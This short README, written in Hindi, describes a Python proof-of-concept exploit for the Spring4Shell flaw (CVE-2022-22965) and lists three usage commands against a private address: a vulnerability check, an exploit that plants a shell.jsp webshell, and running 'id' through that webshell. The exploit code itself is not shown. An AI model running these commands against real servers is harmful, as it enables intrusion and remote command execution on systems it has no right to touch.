
# CVE-2022-22965 (Spring4Shell) के लिए Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें भेद्यता जाँच, दूरस्थ शोषण और वेबशेल कमांड निष्पादन क्षमताएँ शामिल हैं।
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit
python spring4shell.py -u http://192.168.110.117:8080/shell.jsp --cmd id
